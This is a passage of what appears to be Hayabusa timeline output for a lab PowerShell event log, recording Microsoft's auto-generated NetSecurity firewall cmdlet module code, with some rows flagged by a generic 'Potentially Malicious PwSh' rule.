[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.370 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires 
-version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('InterfaceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InterfaceType}) $__cmdletization_queryBuilder.FilterByProperty('InterfaceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceTypeFilter' -Alias '*' function Set-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceTypeFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.371 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.371 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.372 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.372 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceTypeFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server 
activation and config.evtx 2021-04-22 19:19:38.401 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallSecurityFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication[]] ${Authentication}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption[]] ${Encryption}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${OverrideBlockRules}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${LocalUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteUser}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteMachine}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = 
$true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Authentication') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Authentication}) $__cmdletization_queryBuilder.FilterByProperty('Authentication', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Encryption') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Encryption}) $__cmdletization_queryBuilder.FilterByProperty('Encryption', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OverrideBlockRules') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OverrideBlockRules}) $__cmdletization_queryBuilder.FilterByProperty('OverrideBlockRules', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalUser}) $__cmdletization_queryBuilder.FilterByProperty('LocalUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteUser') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteUser}) $__cmdletization_queryBuilder.FilterByProperty('RemoteUsers', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteMachine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteMachine}) 
